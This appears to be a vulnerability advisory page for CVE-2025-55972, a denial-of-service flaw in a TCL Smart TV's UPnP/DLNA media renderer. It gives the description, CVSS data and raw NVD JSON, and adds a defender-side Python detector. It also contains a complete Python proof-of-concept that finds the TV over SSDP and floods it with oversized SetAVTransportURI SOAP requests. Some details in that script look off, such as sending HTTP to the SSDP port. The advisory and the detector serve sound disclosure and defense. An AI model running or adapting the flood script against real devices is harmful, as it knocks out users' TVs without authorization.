Security Vulnerability Report
CVE-2025-55972 CVSS 7.5 HIGH

CVE-2025-55972

Published: 2025-10-03 16:16:18
Last Modified: 2025-10-16 13:12:01

Description

A TCL Smart TV running a vulnerable UPnP/DLNA MediaRenderer implementation is affected by a remote, unauthenticated Denial of Service (DoS) condition. By sending a flood of malformed or oversized SetAVTransportURI SOAP requests to the UPnP control endpoint, an attacker can cause the device to become unresponsive. This denial persists as long as the attack continues and affects all forms of TV operation. Manual user control and even reboots do not restore functionality unless the flood stops.
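A defender-side check for the traffic pattern described above, as an added example that is not part of the original advisory: it scans HTTP requests captured in front of a renderer (for instance by an IDS or reverse proxy) and flags malformed or oversized SetAVTransportURI bodies and per-source request floods. The thresholds, the event tuple layout, the helper names and the sample traffic are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque

# Assumed thresholds (not from the advisory); tune to the local network.
SOAP_ACTION = "urn:schemas-upnp-org:service:AVTransport:1#SetAVTransportURI"
MAX_URI_LEN = 2048       # ceiling for a plausible media URI
MAX_PER_WINDOW = 5       # casting normally sets a URI once per item
WINDOW_SECONDS = 10.0
URI_RE = re.compile(r"<CurrentURI>(.*?)</CurrentURI>", re.S)

def inspect(events):
    """events: (ts, src_ip, SOAPAction header, body) tuples sorted by ts.
    Returns (ts, src_ip, reason) alerts."""
    recent, flooding, alerts = defaultdict(deque), set(), []
    for ts, src, action, body in events:
        if action.strip('"') != SOAP_ACTION:
            continue                       # other UPnP actions are ignored
        m = URI_RE.search(body)
        if m is None:
            alerts.append((ts, src, "malformed: no CurrentURI element"))
        elif len(m.group(1)) > MAX_URI_LEN:
            alerts.append((ts, src, f"oversized CurrentURI ({len(m.group(1))} chars)"))
        q = recent[src]
        q.append(ts)
        while ts - q[0] > WINDOW_SECONDS:  # slide the per-source window
            q.popleft()
        if len(q) <= MAX_PER_WINDOW:
            flooding.discard(src)
        elif src not in flooding:          # alert once per burst
            flooding.add(src)
            alerts.append((ts, src, f"flood: {len(q)} requests in {WINDOW_SECONDS:.0f}s"))
    return alerts

def soap_body(uri):
    """Minimal SetAVTransportURI body for the constructed sample below."""
    return ("<s:Envelope><s:Body><u:SetAVTransportURI>"
            f"<InstanceID>0</InstanceID><CurrentURI>{uri}</CurrentURI>"
            "</u:SetAVTransportURI></s:Body></s:Envelope>")

# Constructed sample: one normal cast, then a burst with a long URI.
HDR = f'"{SOAP_ACTION}"'
SAMPLE = [(0.0, "192.0.2.10", HDR, soap_body("http://192.0.2.10:8200/a.mp4"))] + [
    (100.0 + i * 0.5, "192.0.2.66", HDR, soap_body("http://" + "A" * 4000))
    for i in range(8)
]

if __name__ == "__main__":
    for alert in inspect(SAMPLE):
        print(alert)
```

Because the condition is triggered by request volume as well as size, the rate check matters even when every individual request is well-formed.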

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tcl:65c655_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:* - NOT VULNERABLE
TCL Smart TV (all versions running the affected UPnP/DLNA MediaRenderer implementation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-55972 PoC - TCL Smart TV UPnP/DLNA Denial of Service
Author: Security Researcher
Description: This PoC demonstrates a remote unauthenticated DoS attack against
TCL Smart TV's UPnP/DLNA MediaRenderer implementation by flooding the device
with malformed SetAVTransportURI SOAP requests.
"""

import socket
import time
import argparse
import sys

# UPnP control endpoint default port
UPNP_PORT = 1900


# Malformed/oversized SetAVTransportURI SOAP request template
def build_malformed_soap_request(target_ip):
    """Build a malformed SetAVTransportURI SOAP request with oversized payload"""
    # Create an oversized URI to exhaust device resources
    oversized_uri = "http://" + "A" * 65535 + ".malicious.com/stream.m3u8"

    soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetAVTransportURI xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">
      <InstanceID>0</InstanceID>
      <CurrentURI>{oversized_uri}</CurrentURI>
      <CurrentURIMetaData></CurrentURIMetaData>
    </u:SetAVTransportURI>
  </s:Body>
</s:Envelope>'''

    http_request = (
        f"POST /AVTransport/Control HTTP/1.1\r\n"
        f"Host: {target_ip}:{UPNP_PORT}\r\n"
        f"Content-Type: text/xml; charset=\"utf-8\"\r\n"
        f"Content-Length: {len(soap_body)}\r\n"
        f"SOAPAction: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransportURI\"\r\n"
        f"Connection: keep-alive\r\n"
        f"\r\n"
        f"{soap_body}"
    )
    return http_request.encode('utf-8')


def discover_upnp_endpoint(target_ip, timeout=3):
    """Discover the actual UPnP control endpoint via SSDP M-SEARCH"""
    ssdp_request = (
        "M-SEARCH * HTTP/1.1\r\n"
        "HOST: 239.255.255.250:1900\r\n"
        "MAN: \"ssdp:discover\"\r\n"
        "MX: 2\r\n"
        "ST: urn:schemas-upnp-org:service:AVTransport:1\r\n"
        "\r\n"
    ).encode('utf-8')

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(ssdp_request, (target_ip, 1900))

    try:
        while True:
            data, addr = sock.recvfrom(2048)
            response = data.decode('utf-8', errors='ignore')
            if "AVTransport" in response:
                # Extract the control URL from the response
                for line in response.split('\r\n'):
                    if line.lower().startswith('location:'):
                        return line.split(':', 1)[1].strip()
    except socket.timeout:
        pass
    finally:
        sock.close()

    return f"http://{target_ip}:{UPNP_PORT}/AVTransport/Control"


def flood_target(target_ip, duration=60, thread_count=10):
    """Flood the target with malformed SetAVTransportURI requests"""
    print(f"[*] Starting DoS attack against {target_ip}")
    print(f"[*] Duration: {duration} seconds")
    print(f"[*] Press Ctrl+C to stop\n")

    end_time = time.time() + duration
    request_count = 0

    try:
        while time.time() < end_time:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(5)
                sock.connect((target_ip, UPNP_PORT))

                payload = build_malformed_soap_request(target_ip)
                sock.send(payload)
                request_count += 1

                if request_count % 10 == 0:
                    print(f"[+] Sent {request_count} requests...")

                sock.close()
            except (socket.error, ConnectionRefusedError, OSError) as e:
                # Device may become unresponsive - this indicates successful DoS
                if "Connection refused" in str(e):
                    print(f"[!] Target appears unresponsive after {request_count} requests")
                time.sleep(0.1)
                continue
    except KeyboardInterrupt:
        print(f"\n[*] Attack stopped. Total requests sent: {request_count}")
        sys.exit(0)

    print(f"\n[*] Attack completed. Total requests sent: {request_count}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-55972 PoC - TCL Smart TV DoS')
    parser.add_argument('target', help='Target TV IP address')
    parser.add_argument('-d', '--duration', type=int, default=60, help='Attack duration in seconds')
    args = parser.parse_args()

    print("=" * 60)
    print("CVE-2025-55972 - TCL Smart TV UPnP/DLNA DoS PoC")
    print("For authorized testing only!")
    print("=" * 60)
    print()

    # Discover the UPnP endpoint
    control_url = discover_upnp_endpoint(args.target)
    print(f"[*] UPnP control endpoint: {control_url}")
    print()

    # Launch the flood attack
    flood_target(args.target, args.duration)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55972", "sourceIdentifier": "[email protected]", "published": "2025-10-03T16:16:17.670", "lastModified": "2025-10-16T13:12:00.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A TCL Smart TV running a vulnerable UPnP/DLNA MediaRenderer implementation is affected by a remote, unauthenticated Denial of Service (DoS) condition. By sending a flood of malformed or oversized SetAVTransportURI SOAP requests to the UPnP control endpoint, an attacker can cause the device to become unresponsive. This denial persists as long as the attack continues and affects all forms of TV operation. Manual user control and even reboots do not restore functionality unless the flood stops."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tcl:65c655_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EF46958-23C3-4BA3-A136-0F4DE0420DE9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:*", "matchCriteriaId": "71800B88-6570-4AA3-8968-A897A498739E"}]}]}], "references": [{"url": "https://github.com/Szym0n13k/CVE-2025-55972-Remote-Unauthenticated-Denial-of-Service-DoS-in-TCL-Smart-TV-UPnP-DLNA-AVTransport", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=CRik5mp4SW4", "source": "[email protected]", "tags": ["Exploit"]}]}}